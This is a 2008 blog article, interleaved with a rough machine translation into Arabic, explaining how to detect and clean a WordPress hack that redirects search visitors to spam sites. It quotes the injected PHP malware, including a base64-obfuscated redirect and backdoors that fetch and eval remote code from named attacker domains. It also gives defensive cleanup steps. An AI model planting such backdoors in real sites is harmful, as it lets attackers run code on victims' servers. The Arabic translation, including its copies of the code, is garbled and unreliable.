WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites WordPress المأجور : استعادة واصلاح محرك بحث وصور او أي كعكه اعادة توجيه حركة المرور الخاصة بك - needs.info ، anyresults.net ، الذهبي - info.net وغيرها من المواقع غير القانونية

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. القراصنه هي الذهاب الى المأجور واستغلال بلوق WordPress استضافت كل الويب ، عن طريق الحقن وزرع شفره خبيثة WordPress والمدونات وقاعدة بيانات لاعادة توجيه الزوار وتبلغ من صور ومحركات البحث الاخرى الى مواقع غير مرغوبة مثل الخاص بك - needs.info ، Anyresults.net ، الذهبي - info.net ، keymachine.de ، beliy.us ، seogoogle.us ومواقع أخرى كثيرة غير المرغوبه التي شغلها مع دفع لكل الاعلانات انقر جنة البرنامج والتنسيق. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. ويبدو ان بعض المأجور الهدف عن طريق اعادة توجيه اكبر حشد جميع دون WordPress الكعكه. Without been hacked, these traffic supposedly to arrive at the blog as destination. تم دون hacked ، هذه الحركة ويفترض ان يصل الى مكان بلوق كما المقصد.

Symptoms of the Search Engine Redirection Hack اعراض للمحرك بحث اعادة توجيه المأجور

Note that not all symptoms may happen altogether. علما انه ليست كل الاعراض يمكن ان يحدث تماما. There may be more than one method of hacks existed, which contributed to different finding and possible resolution. قد يكون هناك اكثر من طريقة واحدة للالمأجورون وجدت ، الامر الذي ساهم في ايجاد مختلف وممكن القرار.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. اضغط على اي من خلال محركات البحث مثل صور ، وياهو ، AOL ، والتضامن ، ويندوز لايف نتائج البحث ، بما فيها الاسم بلوق ، سيعاد توجيه واحالتها الى هاكر مواقع مثل الخاص بك - needs.info ، anyresults.net ، الذهبي - معلومات . الصافية ، keymachine.de ، beliy.us ، seogoogle.us ، مع قائمة على يقين من أن تنمو. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine. المشاهد يصل هاكر في نفس الصفحه مع البحث الخيط ان هذا الشخص يستخدم للبحث في محرك البحث.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too. انقر على وصلة الى بلوق على قارئ ار اس اس مثل صور القارئ يمكن اعادة توجيهها الى موقع هاكر ايضا.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites. زائر دون أي حساب على بلوق ، او عدم دخول (ومن ثم لا كوكي قد اكتشفت مدونة الخبيثه) ، وسيتم اعادة توجيهها الى مواقع غير مرغوبة.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem. الزيارات الا من محرك البحث هي تم اعادة توجيه بعيدا ، وحيلة لخداع حول ادارة وربما الكثير من المدونين ، ومشرفي المواقع لاصحاب المواقع ، او على الاقل تأخير الكشف عن هذه المشكلة.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact. مفاجئة ضخمة والهبوط الحاد للوتفقد كمية هاءله من الزوار والاتجار بها وجهات النظر في صفحة ويب لتعقب الاحصاءات ، وخصوصا مع حركة المرور كما صور الاحالات ، على الرغم من محرك بحث ترتيب النتائج سليم.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. Massic من انخفاض الايرادات من الاعلانات او غيرها من صور AdSense شبكة اعلانات ، او اللجان التابعة.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: التالية قاعدة المشفره المدونه بي. اتش. بى قد تظهر على رزمه العمل - بلوق - header.php الملف :

  <?php \ <؟ بي. اتش. بى \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); seref دولار = مصفوفه ( "صور" ، و "MSN" ، و "عيش" ، و "altavista" ، "آسال" و "ياهو" و "AOL" ، و "سي" ، و "الطقس" ، "Alexa") ؛
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; } ser دولار = 0 ؛ foreach ($ seref المرجع دولار) اذا كان (strpos (strtolower ($ _server [ 'http_referer'])،$ المرجع)! == كاذبة) ($ ser = "1؟ ؛ كسر ؛)
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> اذا كانت الاجابه ب ($ ser == "1؟ & & SizeOf (_cookie دولار) == 0) (راسيه (" الموقع : http:// ". base64_decode (" yw55cmvzdwx0cy5uzxq =")."/")؛ الخروج ؛)؟>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. صورة ، والذي هو في الواقع مجموعة من قانون بي. اتش. بى الخبيثه ، وقد اضيفت الى wp-contents/uploads الدليل. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg. فعلى سبيل المثال ، wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg ، أو انها قد تكون موضوع الموجود في مجلد ، اي wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg. اسم الصورة قد تكون في شكل xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. دخول ادرجت في قاعدة بيانات الخلية لWordPress wp_options لتنشيط صورة (بي. اتش. بى الخبيثه والقانون) بوصفها البرنامج المساعد ، وعادة ما rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. وقد تكون هناك ايضا مدونات الخبيثه ، لا سيما تلك التي تفسر مع مييقتلا هدحو () او base64_decode () القيادة اضيفت الى ملفات اخرى WordPress بي. اتش. بى. Examples are the following codes: ومن الامثله على الرموز التالية :

  if(isset($_GET['p'])) { اذا كانت الاجابه ب (isset ($ _get [ 'ف'])) (
$sock = @fsockopen(’km20725.keymachine.de’, 80); جورب دولار = @ fsockopen ( 'km20725.keymachine.de' ، 80) ؛
if($sock){ اذا دولار (جورب) (
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”); fwrite ($ الجورب ، 'الحصول على http://km20725.keymachine.de/server/index.php؟host ='.$_ خادم [' server_name '].'&ف الحصول على ='.$_ [' ف '].' بروتوكول انتقال النص المتشعب / 1،0 '." \ ص \ n ") ؛
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”); fwrite ($ الجورب ، 'المضيفه : km20725.keymachine.de'. "\ ص \ n \ ص \ n") ؛
while($content[] = fgets ($sock)); وفي حين دولار (المحتوى [] = fgets ($ الجورب)) ؛
$content = implode(”, $content); محتوى انفجر دولار = ( "، مضمون دولار) ؛
@eval(trim(substr($content, strpos($content, “\r\n\r\n”)))); @ مييقتلا هدحو (تقليم (substr ($ المحتوى ، strpos ($ المضمون ، "\ ص \ n \ ص \ n"))))؛
fclose ($sock);} fclose ($ جورب) ؛)
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); اذا كانت الاجابه ب (isset ($ _get [ 'ف'])) (@ مييقتلا هدحو (@ file_get_contents ( 'http://beliy.us/server/index.php؟host ='.$_ خادم [' server_name '].'&ف = '. _get دولار [' ف ']))؛
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); اذا كانت الاجابه ب (isset ($ _get [ 'ف'])) (@ مييقتلا هدحو (@ file_get_contents ( 'http://seogoogle.us/server/index.php؟host ='.$_ خادم [' server_name '].'&ف = '. _get دولار [' ف ']))؛
} )

  eval(gzinflate(base64_decode( مييقتلا هدحو (gzinflate (base64_decode (

• WordPress theme that is been activated and used can be injected with hacking code and affected too. WordPress وهذا هو موضوع تم تنشيط ويمكن استخدام حقن تقطيع المدونه واثرت ايضا. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below هذه المدونه عادة موجودة في index.php او header.php للموضوع ، ولها خط مماثل ليلى

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: اذا كانت الاجابه ب ($ ser == "1" & & SizeOf (_cookie دولار) == 0) (راسيه ( "الموقع :

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some WordPress فان حركة البحث على اعادة توجيه البريد المزعج الموقع المأجور يحدث على الأرجح بسبب ضعف الامن والثقب التي لا مالك بلوق مصححة عندما تقرر عدم الترقيه الى الاصدار الاخير من WordPress (على الرغم من ان بعض reports تقارير that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). ان كان بلوق hacked على الرغم من انها بالفعل على آخر اصدار من WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages. ايا كان السبب ، واليك تصحيحات وحل لتسوية وهزيمة المأجور لضمان انك صاحب عودة حركة السير وتجنب عوقبت من قبل من جانب صور غير معقولة لاعادة توجيه البريد المزعج صفحة.

1. Backup the WordPress database. WordPress نسخ احتياطي لقاعدة البيانات.
2. Use phpMyAdmin to browse WordPress MySQL database tables. Phpmyadmin لاستخدام الخلية WordPress استعرض جداول قاعدة البيانات. Go to wp_options table, and then edit the row named active_plugins . اذهب الى wp_options الجدول ، وبعد ذلك تحرير الصف اسمه active_plugins. The row details all active plugins that has been activated. الصف تفاصيل جميع ملحقات النشطه التي تم تفعيلها. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. اذهب من خلال قائمة (في السطر) ، والبحث عن وضع البرنامج المساعد المسمى انتهت صورة التمديد ، مثل. Jpg ،. جايباغ ،. جي. آي. اف الخ وعلى سبيل المثال ، abcdefgh_old.jpeg. Note down the path to the image file. علما السير على طريق لملف الصورة.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file. أو باستخدام ssh sftp (أنسى لبروتوكول نقل الملفات او التلنت الأمن) ، ثم انتقل الى مسار الملف ، وتحذف الملف.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. اذهب الى ملحقات WordPress مدير الفريق ، اي تفعيل او تعطيل البرنامج المساعد لالخبيثه واضح من البرنامج المساعد من "active_plugins" على التوالي.
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : عودة الى phpmyadmin ، wp_options في الجدول ، نجد على التوالي التي تتضمن السلسله option_name التالية :

   rss_f541b3abd05e7962fcab37737f40fad8 rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away. حذف الصف بعيدا.

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial: اذا كنت لا تعرف كيفية اداء تنظيف قاعدة بيانات مفصلة في الخطوات المذكورة اعلاه ، وفيما يلي أمثلة توضيحيه الفيديو :

6. Go to wp_users table. اذهب الى wp_users الجدول. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number). وإذا كان ثمة اسم المستخدم (قيمة فارغه في ميدان user_nicename) التي انشئت في 00:00:00 على 0000-00-00 ، علما ضاغطا على هوية المستخدم (رقم تعريف الميدان ، عددا). Delete the user. حذف المستخدم.
7. Browse the wp_usermeta table. استعرض wp_usermeta الجدول. Locate all rows with user_id matches the ID of the deleted illegal user. العثور على جميع الصفوف مع user_id مباريات الهوية غير المشروع للحذف المستخدم. There are normally three rows been associated to the invader user ID. وهناك عادة ثلاثة صفوف ارتبط الغزاه الى هوية المستخدم. Delete all the associated rows. حذف كل ما يرتبط بها من الصفوف.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. تسجيل الدخول الى خادم لتحرير موضوع الملفات ، او استعراض موضوع الملفات قانون في موضوع تحرير WordPress مدير فريق التصميم. Check the header.php and index.php for any suspicious code. التحقق من وindex.php header.php عن اي قانون المشبوهة. As mentioned above, look for something similar to the line below: وكما ذكر اعلاه ، والبحث عن شيء مماثل الى خط ادناه :

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: اذا كانت الاجابه ب ($ ser == "1" & & SizeOf (_cookie دولار) == 0) (راسيه ( "الموقع :

   If found, delete and remove the code. واذا وجدت ، حذف وازالة المدونه. Note that the malicious code will be several lines long in total. نلاحظ ان القانون سيكون الخبيثه عدة خطوط طويلة في المجموع.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. اذا لم يوجد بالفعل ، وتهيئة الملف index.html فارغ في wp-contents/plugins الدليل. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. الفراغ index.html الجلود محتويات دليل من ملحقات ، على نحو فعال درع المكونات الاضافيه ما استخدمت من المتسللين الى تصلب WordPress وتشديد الامن.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original ويستعاض عن تحميل كل الملفات WordPress (رزمه العمل - ليس فقط - header.php بلوق) على الخادم مع العذبة النظيفه ، والاصل latest version from WordPress احدث اصدار من WordPress (of course, except few files such as wp-config.php and themes). (وبطبيعة الحال ، ما عدا قلة من الملفات مثل رزمه العمل - config.php والمواضيع). If you’re upgrading, read the ان كنت تقوم بالترقيه ، اقرأ guide الدليل carefully. بعناية.
11. Change your password. تغيير كلمة المرور.
12. If you have multiple users, change theirs password (or ask them to change the password) too. اذا كان لديك العديد من المستخدمين ، وتغير كلمة السر لهم (او نطلب منهم تغيير كلمة السر) ايضا.

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. هام : هذا هو الاله الذي ترجم صفحة مقدمة "كما هى" دون ضمان. Machine translation may be difficult to understand. الترجمة الاليه قد يكون من الصعب ان نفهم. Please refer to يرجى الرجوع الى original English article المادة الاصليه English whenever possible. كلما كان ذلك ممكنا.

Share and contribute or get technical support and help at والمساهمة في حصة او الحصول على الدعم التقني والمساعدة فى My Digital Life Forums بلدي الرقميه الحياة المنتديات .

Related Articles مقالات ذات صلة

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank اضافة الى العلاقة nofollow WordPress مدونات لزيادة تصنيف الصفحات
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin ووردبريس البرنامج المساعد : عرض feedburner غوغل تحليلات وتقارير الاحصاءات الواردة من ادارة الموقع
• Technorati Incoming Links Plugin for WordPress Technorati الوافد صلات البرنامج المساعد لWordPress
• A Glance At Google Merchant Search وفي جولة على صور التاجر البحث
• How to Avoid, Bypass or Escape Google Sandbox كيف تتجنب ، تجاوز او الهروب صور الصندوق الرمل
• Ask.com Search Engine Review by CNNMoney Ask.com محرك البحث عن طريق استعراض cnnmoney
• Drive More Traffic by Using Images حملة زيادة في الحركة باستخدام الصور
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder سيو الودية طريقة اعادة كتابة عنوان موقع على التحرك من اجل القضاء على دليل فرعي من المجلد المحتوى
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template إدماج وعرض صور AdSense للبحث والتعاونيه نتائج محرك البحث المخصص في قالب الصفحه بلوق WordPress
• Which Search Engine is the Best and Most Relevant? محرك البحث الذي هو أفضل وأهم؟

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under هذا الدخول على موقع الثلاثاء ، يونيو 10th ، 2008 في 1:03 صباحا ويقدم في اطار Weblogs سجلات متابعة الموقع . . You can follow any responses to this entry through the يمكنك متابعة اية ردود على هذه الدخول عبر RSS 2.0 ار اس اس 2،0 feed. تغذية. You can يمكنك leave a response ترك الرد , or ، أو trackback Trackback from your own site. من موقعك الخاص.